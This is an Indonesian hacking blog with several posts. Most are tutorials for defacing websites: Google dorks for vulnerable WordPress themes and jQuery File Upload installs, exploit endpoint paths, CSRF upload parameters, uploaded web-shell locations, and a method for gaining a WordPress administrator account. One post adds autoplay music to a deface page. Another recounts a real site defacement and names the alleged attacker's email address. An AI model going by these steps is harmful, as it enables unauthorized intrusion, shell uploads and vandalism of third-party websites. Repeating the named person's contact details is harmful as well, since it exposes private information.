Kamis, 26 Januari 2017

Cara Menambahkan Lagu di Script Deface

HumarTutor - Lagu merupakan hal tambahan pada script deface untuk permasalahan ini. Karena dengan lagu bisa menambah ke-keren-an script itu. Kebanyakan script deface tidak memiliki lagu.



Nah, untuk itu disini kita akan belajar bagaimana cara menambahkan lagu pada script deface kita sendiri.

Bahan :

1. Script deface tentunya.

2. Notepad / Notepad++

Langkah :

1. Copy script berikut :

<iframe width="0" height="0" src="//www.youtube.com/embed/lqYQXIt4SpA?rel=0&autoplay=1&loop=1&playlist=60ItHLz5WEA" frameborder="0" allowfullscreen></iframe>


2. Perhatikan kode lqYQXIt4SpA dan 60ItHLz5WEA itu merupakan kode lagu nya, jika ingin mengganti, cari kode lagu youtube yang kamu inginkan.

Lalu, bagaimana cara mencari kode lagu yang diinginkan?
Contohnya :
https://www.youtube.com/watch?v=60ItHLz5WEA : Lagu Alan Walker - Faded

Jadi 60ItHLz5WEA merupakan kode untuk lagu alan walker - faded.

3. Masukkan kode lagu kedalam script diatas dan masukkan ke script deface.

4. Kemudian save script tersebut.

Coba untuk memasang script pada web. Jika sudah terdengar lagu, maka kalian berhasil. Tutorial ini sangat mudah, tapi perlu diperhatikan untuk permasalahan lagu yang tidak muncul.

nb : tidak semua lagu bisa ditambahkan pada script deface, jika kalian mencoba lagu A tidak berhasil cobalah untuk mengganti lagu B dan berhasil, maka permasalahan ada di lagu A yang tidak support.

Title :

Cara Menambahkan Lagu di Script Deface

Reviewed by

Humar

On

16.36.00

Rating :

5

Sabtu, 21 Januari 2017

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload


HumarTutor - Cara Deface Wordpress Theme Anthology Vulnerability File Upload

Yak, sebenernya ini exploit lama, iseng iseng dorking eh... nemu vuln zh, yah share aja di HumarTutor deh
Lansung aja kuy...

Syarat :

1. Shell :

2.. Dork :
inurl:/themes/Anthology/
inurl:wp-content/themes/Anthology/

2. Exploit :
/functions/upload-handler.php

Contoh :
site.com/wp-content/themes/Anthology/functions/upload-handler.php

3. CSRF :
1. Dorking dulu bos q

2. Exploit pake exploit diatas.

Vuln? ada tulisan error.
Ga ada? skip.

3. Selanjutnya eksekusi pake CSRF, terserah mau pake yang apa. Mau gampang ya Pake online.

Online
Tampilan CRF Online

- URL = isi dengan web target.
- POSTFILE = untuk method ini pake "pexetofile" (tanpa kutip)

4. Kalo udah,
Sukses exploit? ada nama file yang lu upload.
Nothing? skip

5. Shell Access

site.com/wp-content/uploads/[yeat]/[month]/namafilenya.waug

EZ kan??


Title :

Cara Deface Wordpress Theme Anthology Vulnerablity File Upload

Reviewed by

Humar

On

22.29.00

Rating :

5

Jumat, 20 Januari 2017

Cara Deface Dengan Method jQuery File Upload Vulnerability

Vuln


HumarTutor - Cara Deface Dengan Method jQuery File Upload Vulnerability

Mungkin jQuery File Upload adalah cara mudah buat deface, dengan upload saja seh.

Yang susah ya dork nya, kudu pinter pinter kalo pengen buat nemu yang vuln

Syarat :

1. Dork :
inurl:/assets/global/plugins/jquery-file-upload/
inurl:/
jquery-file-upload/

2. Exploit
/server/php/index.php

contoh
site.com/assets/global/plugins/jquery-file-upload/server/php/index.php

3. CSRF
untuk CSRF pake yang online aja biar gampang

Post file? files[]

Langkah :

1. Dorking dulu





2. Nemu? exploit dulu
Blank?? skip

Vuln? setidaknya ada tulisan kayak gambar dibawah

Vuln
foto : ken7ester

3. Pake CSRF Online
Post file? files[]


Online

4. Shell Access ??

site.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php

Title :

Cara Deface Dengan Method jQuery File Upload Vulnerability

Reviewed by

Humar

On

15.37.00

Rating :

5

Cara Deface Wordpress Add Admin Vulnerability Method

Press

HumarTutor - Cara Deface Wordpress Add Admin Method (SIMPLE)

Setelah lama ga post, sekarang admin mau post cara deface Wordpress Add Admin, cara ini cukup simple karena dengan exploit + register saja kalian udah bisa jadi admin kwkw.

Terserah mau diapain kalo udah jadi admin yakan....

Mungkin cara ini udah lama ya, gpp de. Yang penting mah kalo Deface method ini ya dork nya yang harus mantep.

Syarat :

1. Shell kalian atau Download di 

2. Dork :
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/

3. CSRF
HTML

4. Exploit :
/hades_framework/option_panel/ajax.php

Contoh :
http://site.com/wp-content/themes/dagda/hades_framework/option_panel/ajax.php

Langkah :

1. Biasa lah, dorking dulu 

2. Exploit pake exploit diatas

Vuln??

Blank kawan selain?? skip 

3. Pake CSRF nya
kalo w pake CSRF versi online buatan mimin sendiri, gampang sih buatnya kalo mau buat sendiri

CSRF
Add Admin CSRF Online

Seperti diatas tampilannya.

Caranya gampang 
- Masukkin site nya, trus LOCK
- Masukkin email mu, trus SUBMIT

Kalo versi HTML ya anu sendiri

Sukses??

ada tulisan Sukses, Ga ada tulisan?? skip

4. Register di Web Target
Caranya??
wp-login?action=register

Contoh??
site.com/wp-login.php?action=register

5. Cek email kalian 

6. Verifikasi

7. Login

Done, dah jadi admin

EZZ kan??



Title :

Cara Deface Wordpress Add Admin Vulnerability Method

Reviewed by

Humar

On

15.04.00

Rating :

5

Kamis, 19 Januari 2017

Web Hiburan Meme 4tawa.co Di Retas???


HumarTutor - Web Hiburan Meme 4tawa.co Di Retas??? 

4tawa.co merupakan situs hiburan meme dan juga terdapat video - video lucu.
Website 4tawa.co ini mempunyai 400k lebih followers di fanspagenya.

Menurut Zone-h.org 4tawa.co diretas  pada tanggal 13-01-2017. Dan diretas oleh KONSLET hal itu jelas dia memampangkan namanya di halaman 4tawa.co yang bertulis HACKED BY KONSLET.

Selain itu di laman 4tawa.co pada saat peretasan juga tertulis "ubuntu 13.10? apache? lol wkwkwkw. gak bisa hardening server mz?" 

Dibawah itu juga terdapat nick nick yang diduga teman teman pelaku.

Juga dibagian footer laman tertulis Indonesia Hacker Rulez  dan email pelaku yakni anas_ramadani@yahoo.it

Dikutip dari 3xploi7 bug POC nya adalah

Lavarel ninja media Script

Sampai sekarang website 4tawa.co bertuliskan
"Mohon Maaf, Untuk sementara web 4tawa.co sedang diperbaiki

Minta doanya dari seluruh member agar perbaikan ini tidak memakan waktu yang lama

Terima Kasih, :)"

Referensi ; 3xpoi7 bug

Title :

Web Hiburan Meme 4tawa.co Di Retas???

Reviewed by

Humar

On

20.33.00

Rating :

5